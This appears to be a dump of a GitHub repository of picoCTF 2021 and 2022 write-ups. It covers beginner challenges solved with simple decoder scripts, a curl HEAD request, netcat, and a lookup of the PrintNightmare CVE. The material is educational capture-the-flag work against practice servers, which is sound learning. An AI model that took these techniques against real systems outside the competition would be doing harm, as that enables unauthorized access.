-------------------------------------------------------------------------------- 1 | # General Skills Challenges 2 | 3 | 7 Challenges: 4 | - [Magikarp Ground Mission](Magikarp_Ground_Mission.md) 5 | - [Nice netcat...](Nice_netcat.md) 6 | - [Obedient Cat](Obedient_Cat.md) 7 | - [Python Wrangling](Python_Wrangling.md) 8 | - [Static ain't always noise](Static_aint_always_noise.md) 9 | - [Tab, Tab, Attack](Tab_Tab_Attack.md) 10 | - [Wave a flag](Wave_a_flag.md) 11 | -------------------------------------------------------------------------------- /picoCTF_2021/General_Skills/Wave_a_flag.md: -------------------------------------------------------------------------------- 1 | # Wave a flag 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 10 10 | Tags: picoCTF 2021, General Skills 11 | Author: SYREAL 12 | 13 | Description: 14 | Can you invoke help flags for a tool or binary? 15 | 16 | This program has extraordinarily helpful information... 17 | 18 | Hints: 19 | 1. This program will only work in the webshell or another Linux computer. 20 | 2. To get the file accessible in your shell, enter the following in the Terminal prompt: 21 | $ wget https://mercury.picoctf.net/static/a00f554b16385d9970dae424f66ee1ab/warm 22 | 3. Run this program by entering the following in the Terminal prompt: 23 | $ ./warm, but you'll first have to make it executable with $ chmod +x warm 24 | 4. -h and --help are the most common arguments to give to programs to get more information from them! 25 | 5. Not every program implements help features like -h and --help. 26 | ``` 27 | Challenge link: [https://play.picoctf.org/practice/challenge/170](https://play.picoctf.org/practice/challenge/170) 28 | 29 | ## Solution 30 | 31 | Let's make sure the program is executable and run it 32 | ```bash 33 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Wave_a_flag] 34 | └─$ chmod +x warm 35 | 36 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Wave_a_flag] 37 | └─$ ./warm 38 | Hello user! Pass me a -h to learn what I can do! 39 | ``` 40 | 41 | Ah, as both the description and the hints suggests we should ask for help with the `-h` parameter. 42 | 43 | Ask for help 44 | ```bash 45 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Wave_a_flag] 46 | └─$ ./warm -h 47 | Oh, help? I actually don't do much, but I do have this flag here: picoCTF{} 48 | ``` 49 | 50 | And there we have the flag. 51 | 52 | For additional information, please see the references below. 53 | 54 | ## References 55 | 56 | - [8 Ways To Get Help On The Linux Shell](https://vitux.com/get-help-on-linux-shell/) 57 | - [chmod - Linux manual page](https://man7.org/linux/man-pages/man1/chmod.1.html) 58 | -------------------------------------------------------------------------------- /picoCTF_2021/Reverse_Engineering/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering Challenges 2 | 3 | 10 Challenges: 4 | - [ARMssembly 0](ARMssembly_0.md) 5 | - [ARMssembly 1](ARMssembly_1.md) 6 | - [ARMssembly 2](ARMssembly_2.md) 7 | - [ARMssembly 3](ARMssembly_3.md) 8 | - [ARMssembly 4](ARMssembly_4.md) 9 | - [crackme-py](crackme-py.md) 10 | - [keygenme-py](keygenme-py.md) 11 | - [Shop](Shop.md) 12 | - [speeds and feeds](speeds_and_feeds.md) 13 | - [Transformation](Transformation.md) 14 | -------------------------------------------------------------------------------- /picoCTF_2021/Reverse_Engineering/The_flag_in_NC_Viewer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2021/Reverse_Engineering/The_flag_in_NC_Viewer.png -------------------------------------------------------------------------------- /picoCTF_2021/Reverse_Engineering/crackme-py.md: -------------------------------------------------------------------------------- 1 | # crackme-py 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solutions](#solutions) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 30 10 | Tags: picoCTF 2021, Reverse Engineering 11 | Author: SYREAL 12 | 13 | Description: 14 | 15 | crackme.py 16 | 17 | Hints: 18 | (None) 19 | ``` 20 | Challenge link: [https://play.picoctf.org/practice/challenge/175](https://play.picoctf.org/practice/challenge/175) 21 | 22 | ## Solutions 23 | 24 | ### Analyze the Python script 25 | 26 | Let's start by looking at the `decode_secret` function of the script 27 | ```python 28 | def decode_secret(secret): 29 | """ROT47 decode 30 | 31 | NOTE: encode and decode are the same operation in the ROT cipher family. 32 | """ 33 | 34 | # Encryption key 35 | rotate_const = 47 36 | 37 | # Storage for decoded secret 38 | decoded = "" 39 | 40 | # decode loop 41 | for c in secret: 42 | index = alphabet.find(c) 43 | original_index = (index + rotate_const) % len(alphabet) 44 | decoded = decoded + alphabet[original_index] 45 | 46 | print(decoded) 47 | ``` 48 | 49 | This is actually the entire code to decode the flag. We can just reuse most of the script. 50 | 51 | ### Write a decoder script 52 | 53 | Let's copy the original script, remove the `choose_greatest` function, remove some comments, add a shebang and add a call to the `decode_secret` function 54 | ```python 55 | #!/usr/bin/python 56 | 57 | bezos_cc_secret = "A:4@r%uL`M-^M0c0AbcM-MFE0cdhb52g2N" 58 | 59 | # Reference alphabet 60 | alphabet = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"+ \ 61 | "[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~" 62 | 63 | def decode_secret(secret): 64 | rotate_const = 47 65 | 66 | decoded = "" 67 | for c in secret: 68 | index = alphabet.find(c) 69 | original_index = (index + rotate_const) % len(alphabet) 70 | decoded = decoded + alphabet[original_index] 71 | print(decoded) 72 | 73 | decode_secret(bezos_cc_secret) 74 | ``` 75 | 76 | ### Get the flag 77 | 78 | Then, make sure the script is executable and run it to get the flag 79 | ```bash 80 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Reverse_Engineering/crackme-py] 81 | └─$ chmod +x get_flag.py 82 | 83 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Reverse_Engineering/crackme-py] 84 | └─$ ./get_flag.py 85 | picoCTF{} 86 | ``` 87 | 88 | ## References 89 | 90 | - [Wikipedia — ROT13](https://en.wikipedia.org/wiki/ROT13) 91 | -------------------------------------------------------------------------------- /picoCTF_2021/Reverse_Engineering/speeds_and_feeds.md: -------------------------------------------------------------------------------- 1 | # speeds and feeds 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solutions](#solutions) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 50 10 | Tags: picoCTF 2021, Reverse Engineering 11 | Author: RYAN RAMSEYER 12 | 13 | Description: 14 | There is something on my shop network running at nc mercury.picoctf.net 59953, but I can't tell what it is. 15 | Can you? 16 | 17 | Hints: 18 | 1. What language does a CNC machine use? 19 | ``` 20 | Challenge link: [https://play.picoctf.org/practice/challenge/116](https://play.picoctf.org/practice/challenge/116) 21 | 22 | ## Solutions 23 | 24 | ### Analyze the output 25 | 26 | We start by connecting to the service and watch the output 27 | ```bash 28 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Reverse_Engineering/speeds_and_feeds] 29 | └─$ nc mercury.picoctf.net 59953 30 | G17 G21 G40 G90 G64 P0.003 F50 31 | G0Z0.1 32 | G0Z0.1 33 | G0X0.8276Y3.8621 34 | G1Z0.1 35 | G1X0.8276Y-1.9310 36 | G0Z0.1 37 | G0X1.1034Y3.8621 38 | G1Z0.1 39 | G1X1.1034Y-1.9310 40 | G0Z0.1 41 | G0X1.1034Y3.0345 42 | G1Z0.1 43 | G1X1.6552Y3.5862 44 | G1X2.2069Y3.8621 45 | G1X2.7586Y3.8621 46 | G1X3.5862Y3.5862 47 | G1X4.1379Y3.0345 48 | G1X4.4138Y2.2069 49 | G1X4.4138Y1.6552 50 | G1X4.1379Y0.8276 51 | G1X3.5862Y0.2759 52 | G1X2.7586Y0.0000 53 | <---snip---> 54 | ``` 55 | 56 | A LOT of output in some unknown format. Let's save the output in a local file 57 | ```bash 58 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Reverse_Engineering/speeds_and_feeds] 59 | └─$ nc mercury.picoctf.net 59953 > speeds_and_feeds_output.txt 60 | ``` 61 | 62 | Now it's time to research what kind of format this is... 63 | It looks like it is something called [G-code](https://en.wikipedia.org/wiki/G-code). 64 | 65 | Next, we need to find an online interpreter for it. [NC Viewer](https://ncviewer.com/) is one. 66 | 67 | ### Get the flag 68 | 69 | In `NC Viewer`, click on the New File icon and paste in the output from the `speeds_and_feeds_output.txt` file above. 70 | Then click the `PLOT` button. 71 | 72 | The result should look something like this: 73 | 74 | Part of the flag in NC Viewer 75 | 76 | Zoom out and re-position the grid and you have the whole flag. 77 | 78 | For additional information, please see the references below. 79 | 80 | ## References 81 | 82 | - [Wikipedia - G-code](https://en.wikipedia.org/wiki/G-code) 83 | -------------------------------------------------------------------------------- /picoCTF_2021/Web_Exploitation/GET_aHEAD.md: -------------------------------------------------------------------------------- 1 | # GET aHEAD 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 20 10 | Tags: picoCTF 2021, Web Exploitation 11 | Author: MADSTACKS 12 | 13 | Description: 14 | Find the flag being held on this server to get ahead of the competition 15 | http://mercury.picoctf.net:47967/ 16 | 17 | Hints: 18 | 1. Maybe you have more than 2 choices 19 | 2. Check out tools like Burpsuite to modify your requests and look at the responses 20 | ``` 21 | Challenge link: [https://play.picoctf.org/practice/challenge/132](https://play.picoctf.org/practice/challenge/132) 22 | 23 | ## Solution 24 | 25 | The challenge name strongly suggests that you should access the page with the `HEAD` [HTTP request method](https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods). 26 | 27 | Let's use the `curl` tool to do that 28 | ```bash 29 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Web_Exploitation/GET_aHEAD] 30 | └─$ curl -I http://mercury.picoctf.net:47967 31 | HTTP/1.1 200 OK 32 | flag: picoCTF{} 33 | Content-type: text/html; charset=UTF-8 34 | ``` 35 | 36 | And as expected, there is the flag as a custom HTTP header. 37 | 38 | For additional information, please see the references below. 39 | 40 | ## References 41 | 42 | - [HTTP request methods](https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods) 43 | -------------------------------------------------------------------------------- /picoCTF_2021/Web_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Web Exploitation Challenges 2 | 3 | 9 Challenges: 4 | - [Cookies](Cookies.md) 5 | - [GET aHEAD](GET_aHEAD.md) 6 | - [It is my Birthday](It_is_my_Birthday.md) 7 | - [More Cookies](More_Cookies.md) 8 | - [Most Cookies](Most_Cookies.md) 9 | - [Scavenger Hunt](Scavenger_Hunt.md) 10 | - [Some Assembly Required 1](Some_Assembly_Required_1.md) 11 | - [Some Assembly Required 2](Some_Assembly_Required_2.md) 12 | - [Who are you?](Who_are_you.md) 13 | -------------------------------------------------------------------------------- /picoCTF_2022/Binary_Exploitation/CVE-XXXX-XXXX.md: -------------------------------------------------------------------------------- 1 | # CVE-XXXX-XXXX 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | 6 | ## Challenge information 7 | 8 | ```text 9 | Level: Medium 10 | Tags: picoCTF 2022, Binary Exploitation 11 | Author: MUBARAK MIKAIL 12 | 13 | Description: 14 | 15 | The CVE we're looking for is the first recorded remote code execution (RCE) vulnerability in 2021 in 16 | the Windows Print Spooler Service, which is available across desktop and server versions of Windows 17 | operating systems. The service is used to manage printers and print servers. 18 | 19 | Enter the CVE of the vulnerability as the flag with the correct flag format: 20 | picoCTF{CVE-XXXX-XXXXX} replacing XXXX-XXXXX with the numbers for the matching vulnerability. 21 | 22 | Hints: 23 | 1. We're not looking for the Local Spooler vulnerability in 2021... 24 | ``` 25 | 26 | Challenge link: [https://play.picoctf.org/practice/challenge/262](https://play.picoctf.org/practice/challenge/262) 27 | 28 | ## Solution 29 | 30 | Googling for `Windows Print Spooler Service RCE CVE 2021` gives you the answer among the top 10 results. 31 | 32 | Wrap [this CVE-number](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) as instructed to get the flag. 33 | -------------------------------------------------------------------------------- /picoCTF_2022/Binary_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Binary Exploitation Challenges 2 | 3 | ## Medium Binary Exploitation Challenges 4 | 5 | - [basic-file-exploit](basic-file-exploit.md) 6 | - [buffer overflow 0](buffer_overflow_0.md) 7 | - [buffer overflow 1](buffer_overflow_1.md) 8 | - [buffer overflow 2](buffer_overflow_2.md) 9 | - [CVE-XXXX-XXXX](CVE-XXXX-XXXX.md) 10 | - [RPS](RPS.md) 11 | -------------------------------------------------------------------------------- /picoCTF_2022/Cryptography/README.md: -------------------------------------------------------------------------------- 1 | # Cryptography Challenges 2 | 3 | ## Medium Cryptography Challenges 4 | 5 | - [basic-mod1](basic-mod1.md) 6 | - [basic-mod2](basic-mod2.md) 7 | - [credstuff](credstuff.md) 8 | - [morse-code](morse-code.md) 9 | - [rail-fence](rail-fence.md) 10 | - [substitution0](substitution0.md) 11 | - [substitution1](substitution1.md) 12 | - [substitution2](substitution2.md) 13 | - [transposition-trial](transposition-trial.md) 14 | - [Vigenere](Vigenere.md) 15 | -------------------------------------------------------------------------------- /picoCTF_2022/Cryptography/Vigenere.md: -------------------------------------------------------------------------------- 1 | # Vigenere 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Online solver solution](#online-solver-solution) 5 | - [Python solution](#python-solution) 6 | - [References](#references) 7 | 8 | ## Challenge information 9 | 10 | ```text 11 | Level: Medium 12 | Tags: picoCTF 2022, Cryptography 13 | Author: MUBARAK MIKAIL 14 | 15 | Description: 16 | Can you decrypt this message? 17 | 18 | Decrypt this message using this key "CYLAB". 19 | 20 | Hints: 21 | 1. https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher 22 | ``` 23 | 24 | Challenge link: [https://play.picoctf.org/practice/challenge/316](https://play.picoctf.org/practice/challenge/316) 25 | 26 | The message given looks like this 27 | 28 | ```text 29 | rgnoDVD{O0NU_WQ3_G1G3O3T3_A1AH3S_f85729e7} 30 | ``` 31 | 32 | There probably are more ways to solve this challenge, but here are two solutions. 33 | 34 | ## Online solver solution 35 | 36 | You can use an online solver such as [Rumkin](https://rumkin.com/tools/cipher/vigenere/) to solve this challenge. 37 | 38 | Set the 'Operating Mode' to `Decrypt` and set the 'Cipher key' to `CYLAB`. 39 | Then enter the cipher text in the large text field and you get the flag at the bottom of the window. 40 | 41 | ## Python solution 42 | 43 | In addition, let's write a small Python script called `solve.py` to decode this 44 | 45 | ```python 46 | #!/usr/bin/python 47 | # -*- coding: latin-1 -*- 48 | 49 | import string 50 | 51 | cipher_text = "rgnoDVD{O0NU_WQ3_G1G3O3T3_A1AH3S_f85729e7}" 52 | key = 'CYLAB' 53 | 54 | universe = string.ascii_uppercase 55 | uni_len = len(universe) 56 | 57 | flag = '' 58 | k_len = len(key) 59 | 60 | i = 0 61 | for c in cipher_text: 62 | if c.islower(): 63 | txt_index = universe.index(c.upper()) 64 | key_index = universe.index(key[i % k_len]) 65 | i += 1 66 | flag += universe[(txt_index - key_index) % uni_len].lower() 67 | elif c.isupper(): 68 | txt_index = universe.index(c) 69 | key_index = universe.index(key[i % k_len]) 70 | i += 1 71 | flag += universe[(txt_index - key_index) % uni_len] 72 | else: 73 | flag += c 74 | 75 | print(flag) 76 | ``` 77 | 78 | Then make the script executable and run it 79 | 80 | ```bash 81 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Vigenere] 82 | └─$ chmod +x solve.py 83 | 84 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Vigenere] 85 | └─$ ./solve.py 86 | picoCTF{} 87 | ``` 88 | 89 | For additional information, please see the references below. 90 | 91 | ## References 92 | 93 | - [python - Linux manual page](https://linux.die.net/man/1/python) 94 | - [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language)) 95 | - [Vigenère cipher - Wikipedia](https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher) 96 | -------------------------------------------------------------------------------- /picoCTF_2022/Cryptography/basic-mod1.md: -------------------------------------------------------------------------------- 1 | # basic-mod1 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Cryptography 12 | Author: WILL HONG 13 | 14 | Description: 15 | We found this weird message being passed around on the servers, we think we have a working decryption scheme. 16 | Download the message here. 17 | 18 | Take each number mod 37 and map it to the following character set: 0-25 is the alphabet (uppercase), 19 | 26-35 are the decimal digits, and 36 is an underscore. 20 | 21 | Wrap your decrypted message in the picoCTF flag format (i.e. picoCTF{decrypted_message}) 22 | 23 | Hints: 24 | 1. Do you know what mod 37 means? 25 | 2. mod 37 means modulo 37. It gives the remainder of a number after being divided by 37. 26 | ``` 27 | 28 | Challenge link: [https://play.picoctf.org/practice/challenge/253](https://play.picoctf.org/practice/challenge/253) 29 | 30 | ## Solution 31 | 32 | Let's use the instructions above to create a small Python script called `get_flag.py` to solve this challenge 33 | 34 | ```python 35 | #!/usr/bin/python 36 | 37 | # Read the encoded flag as string 38 | with open("message.txt", 'r') as fh: 39 | enc_string = fh.read().strip() 40 | 41 | # Convert to array of numbers 42 | enc_numbers = map(int, enc_string.split()) 43 | 44 | # Create decode array 45 | base_37 = [] 46 | for i in range(26): 47 | base_37 += chr(ord('A') + i) 48 | for i in range(10): 49 | base_37 += chr(ord('0') + i) 50 | base_37 += '_' 51 | 52 | # Decode flag and print it 53 | flag = [] 54 | for x in enc_numbers: 55 | flag += base_37[x % 37] 56 | print('picoCTF{%s}' % "".join(flag)) 57 | ``` 58 | 59 | Then make the script executable and run it 60 | 61 | ```bash 62 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Basic_Mod1] 63 | └─$ chmod +x get_flag.py 64 | 65 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Basic_Mod1] 66 | └─$ ./get_flag.py 67 | picoCTF{} 68 | ``` 69 | 70 | For additional information, please see the references below. 71 | 72 | ## References 73 | 74 | - [Modulo - Wikipedia](https://en.wikipedia.org/wiki/Modulo) 75 | - [python - Linux manual page](https://linux.die.net/man/1/python) 76 | - [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language)) 77 | -------------------------------------------------------------------------------- /picoCTF_2022/Cryptography/basic-mod2.md: -------------------------------------------------------------------------------- 1 | # basic-mod2 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Cryptography 12 | Author: WILL HONG 13 | 14 | Description: 15 | A new modular challenge! Download the message here. 16 | 17 | Take each number mod 41 and find the modular inverse for the result. 18 | 19 | Then map to the following character set: 1-26 are the alphabet, 27-36 are the decimal digits, 20 | and 37 is an underscore. 21 | 22 | Wrap your decrypted message in the picoCTF flag format (i.e. picoCTF{decrypted_message}) 23 | 24 | Hints: 25 | 1. Do you know what the modular inverse is? 26 | 2. The inverse modulo z of x is the number, y that when multiplied by x is 1 modulo z 27 | 3. It's recommended to use a tool to find the modular inverses 28 | ``` 29 | 30 | Challenge link: [https://play.picoctf.org/practice/challenge/254](https://play.picoctf.org/practice/challenge/254) 31 | 32 | ## Solution 33 | 34 | The code for this challenge is almost identical to the [previous challenge](basic-mod1.md). 35 | 36 | For my implementation of modular inverse I found code on [StackOverflow](https://stackoverflow.com/questions/4798654/modular-multiplicative-inverse-function-in-python). It's very easy now in Python 3.8 and later... 37 | 38 | ```python 39 | #!/usr/bin/python 40 | 41 | # Read the encoded flag as string 42 | with open("message.txt", 'r') as fh: 43 | enc_string = fh.read().strip() 44 | 45 | # Convert to array of numbers 46 | enc_numbers = map(int, enc_string.split()) 47 | 48 | # Create decode array 49 | base_37 = [] 50 | for i in range(26): 51 | base_37 += chr(ord('A') + i) 52 | for i in range(10): 53 | base_37 += chr(ord('0') + i) 54 | base_37 += '_' 55 | 56 | # Decode flag and print it 57 | flag = [] 58 | for x in enc_numbers: 59 | flag += base_37[pow(x, -1, 41) - 1] 60 | print('picoCTF{%s}' % "".join(flag)) 61 | ``` 62 | 63 | Then make the script executable and run it 64 | 65 | ```bash 66 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Basic_Mod2] 67 | └─$ chmod +x get_flag.py 68 | 69 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Basic_Mod2] 70 | └─$ ./get_flag.py 71 | picoCTF{} 72 | ``` 73 | 74 | For additional information, please see the references below. 75 | 76 | ## References 77 | 78 | - [Modulo - Wikipedia](https://en.wikipedia.org/wiki/Modulo) 79 | - [python - Linux manual page](https://linux.die.net/man/1/python) 80 | - [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language)) 81 | -------------------------------------------------------------------------------- /picoCTF_2022/Cryptography/morse-code.md: -------------------------------------------------------------------------------- 1 | # morse-code 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Cryptography, morse_code 12 | Author: WILL HONG 13 | 14 | Description: 15 | Morse code is well known. Can you decrypt this? 16 | 17 | Download the file here. 18 | 19 | Wrap your answer with picoCTF{}, put underscores in place of pauses, and use all lowercase. 20 | 21 | Hints: 22 | 1. Audacity is a really good program to analyze morse code audio. 23 | ``` 24 | 25 | Challenge link: [https://play.picoctf.org/practice/challenge/280](https://play.picoctf.org/practice/challenge/280) 26 | 27 | ## Solution 28 | 29 | I searched for an online service to decode morse-code from audio and found [this one on Data Border](https://databorder.com/transfer/morse-sound-receiver/). It is good at presenting the pauses between the "words". 30 | 31 | Create the flag from the output according to the instructions given. 32 | 33 | For additional information, please see the references below. 34 | 35 | ## References 36 | 37 | - [Morse code - Wikipedia](https://en.wikipedia.org/wiki/Morse_code) 38 | - [Morse Code Sound & Vibration Listener](https://databorder.com/transfer/morse-sound-receiver/) 39 | -------------------------------------------------------------------------------- /picoCTF_2022/Cryptography/rail-fence.md: -------------------------------------------------------------------------------- 1 | # rail-fence 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Cryptography 12 | Author: WILL HONG 13 | 14 | Description: 15 | A type of transposition cipher is the rail fence cipher, which is described here. 16 | 17 | Here is one such cipher encrypted using the rail fence with 4 rails. Can you decrypt it? 18 | 19 | Download the message here. 20 | 21 | Put the decoded message in the picoCTF flag format, picoCTF{decoded_message}. 22 | 23 | Hints: 24 | 1. Once you've understood how the cipher works, it's best to draw it out yourself on paper 25 | ``` 26 | 27 | Challenge link: [https://play.picoctf.org/practice/challenge/289](https://play.picoctf.org/practice/challenge/289) 28 | 29 | ## Solution 30 | 31 | Rather than solving this manually I used [this online service at Planet Calc](https://planetcalc.com/6946/). 32 | 33 | It "brute-forces" the number of rails up to a maximum number (with a default of 10). 34 | 35 | Enter the given encoded text in the `Encoded message` text box and press 'CALCULATE'. 36 | And you will get the flag in the output with 4 rails in the `Decode table`. 37 | 38 | For additional information, please see the references below. 39 | 40 | ## References 41 | 42 | - [Rail fence cipher - Wikipedia](https://en.wikipedia.org/wiki/Rail_fence_cipher) 43 | - [Transposition cipher - Wikipedia](https://en.wikipedia.org/wiki/Transposition_cipher) 44 | -------------------------------------------------------------------------------- /picoCTF_2022/Cryptography/substitution1.md: -------------------------------------------------------------------------------- 1 | # substitution1 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Cryptography, Substitution_cipher 12 | Author: WILL HONG 13 | 14 | Description: 15 | A second message has come in the mail, and it seems almost identical to the first one. 16 | Maybe the same thing will work again. 17 | 18 | Download the message here. 19 | 20 | Hints: 21 | 1. Try a frequency attack 22 | 2. Do the punctuation and the individual words help you make any substitutions? 23 | ``` 24 | 25 | Challenge link: [https://play.picoctf.org/practice/challenge/308](https://play.picoctf.org/practice/challenge/308) 26 | 27 | ## Solution 28 | 29 | The message we were given looks like this (with line breaks added) 30 | 31 | ```text 32 | WYHg (gzray hra wimybas yzs hvij) ias i yums rh wrombysa gswbakyu wromsykykrl. Wrlysgyilyg ias 33 | masgslysn dkyz i gsy rh wzivvsljsg dzkwz ysgy yzska wasiykxkyu, yswzlkwiv (iln jrrjvklj) gckvvg, 34 | iln marqvso-grvxklj iqkvkyu. Wzivvsljsg bgbivvu wrxsa i lboqsa rh wiysjraksg, iln dzsl grvxsn, 35 | siwz uksvng i gyaklj (wivvsn i hvij) dzkwz kg gbqokyysn yr il rlvkls gwraklj gsaxkws. WYHg ias 36 | i jasiy diu yr vsial i dkns iaaiu rh wrombysa gswbakyu gckvvg kl i gihs, vsjiv slxkarlosly, iln 37 | ias zrgysn iln mviusn qu oilu gswbakyu jarbmg iarbln yzs dravn hra hbl iln maiwykws. 38 | Hra yzkg marqvso, yzs hvij kg: mkwrWYH{HA3FB3LWU_4774WC5_4A3_W001_7II384QW} 39 | ``` 40 | 41 | Compared to the [previous challenge](substitution0.md) there is no key this time. 42 | 43 | Let's use [quipqiup](https://quipqiup.com/) to solve this as before. 44 | 45 | Input the entire message in the `Puzzle` text field and press `Solve` (with the default setting). 46 | 47 | After a short while, you have the flag at the top of the possible solutions. 48 | 49 | For additional information, please see the references below. 50 | 51 | ## References 52 | 53 | - [Frequency analysis - Wikipedia](https://en.wikipedia.org/wiki/Frequency_analysis) 54 | - [Letter frequency - Wikipedia](https://en.wikipedia.org/wiki/Letter_frequency) 55 | - [Quipqiup - A fast and automated cryptogram solver](https://quipqiup.com/) 56 | - [Substitution cipher - Wikipedia](https://en.wikipedia.org/wiki/Substitution_cipher) 57 | -------------------------------------------------------------------------------- /picoCTF_2022/Cryptography/transposition-trial.md: -------------------------------------------------------------------------------- 1 | # transposition-trial 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Cryptography, cryptography 12 | Author: WILL HONG 13 | 14 | Description: 15 | Our data got corrupted on the way here. 16 | Luckily, nothing got replaced, but every block of 3 got scrambled around! 17 | 18 | The first word seems to be three letters long, maybe you can use that to recover the rest of the message. 19 | Download the corrupted message here. 20 | 21 | Hints: 22 | 1. Split the message up into blocks of 3 and see how the first block is scrambled 23 | ``` 24 | 25 | Challenge link: [https://play.picoctf.org/practice/challenge/312](https://play.picoctf.org/practice/challenge/312) 26 | 27 | ## Solution 28 | 29 | The message given looks like this 30 | 31 | ```text 32 | heTfl g as iicpCTo{7F4NRP051N5_16_35P3X51N3_V091B0AE}2 33 | ``` 34 | 35 | It looks like in each block of three characters the first is shifted to the end of the block. 36 | 37 | Let's write a small Python script called `solve.py` to decode this 38 | 39 | ```python 40 | #!/usr/bin/python 41 | # -*- coding: latin-1 -*- 42 | 43 | encrypted_msg = "heTfl g as iicpCTo{7F4NRP051N5_16_35P3X51N3_V091B0AE}2" 44 | 45 | i = 0 46 | flag = "" 47 | 48 | while i < len(encrypted_msg): 49 | flag += encrypted_msg[i+2] 50 | flag += encrypted_msg[i] 51 | flag += encrypted_msg[i+1] 52 | i += 3 53 | 54 | print(flag) 55 | ``` 56 | 57 | Then make the script executable and run it 58 | 59 | ```bash 60 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Transposition_trial] 61 | └─$ chmod +x solve.py 62 | 63 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Transposition_trial] 64 | └─$ ./solve.py 65 | The flag is picoCTF{} 66 | ``` 67 | 68 | For additional information, please see the references below. 69 | 70 | ## References 71 | 72 | - [python - Linux manual page](https://linux.die.net/man/1/python) 73 | - [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language)) 74 | - [Transposition cipher - Wikipedia](https://en.wikipedia.org/wiki/Transposition_cipher) 75 | -------------------------------------------------------------------------------- /picoCTF_2022/Forensics/Disk_mounted_in_FTK_Imager.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2022/Forensics/Disk_mounted_in_FTK_Imager.png -------------------------------------------------------------------------------- /picoCTF_2022/Forensics/Lookey_here.md: -------------------------------------------------------------------------------- 1 | # Lookey here 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Forensics, grep 12 | Author: LT 'SYREAL' JONES / MUBARAK MIKAIL 13 | 14 | Description: 15 | Attackers have hidden information in a very large mass of data in the past, maybe they are still doing it. 16 | 17 | Download the data here. 18 | 19 | Hints: 20 | 1. Download the file and search for the flag based on the known prefix. 21 | ``` 22 | 23 | Challenge link: [https://play.picoctf.org/practice/challenge/279](https://play.picoctf.org/practice/challenge/279) 24 | 25 | ## Solution 26 | 27 | The most efficient way to get the flag is to use `grep` with `-o` to only output the matched text 28 | and `-E` to say that your pattern is an extended regular expression 29 | 30 | ```bash 31 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Forensics/Lookey_here] 32 | └─$ grep -oE 'picoCTF{.*}' anthem.flag.txt 33 | picoCTF{} 34 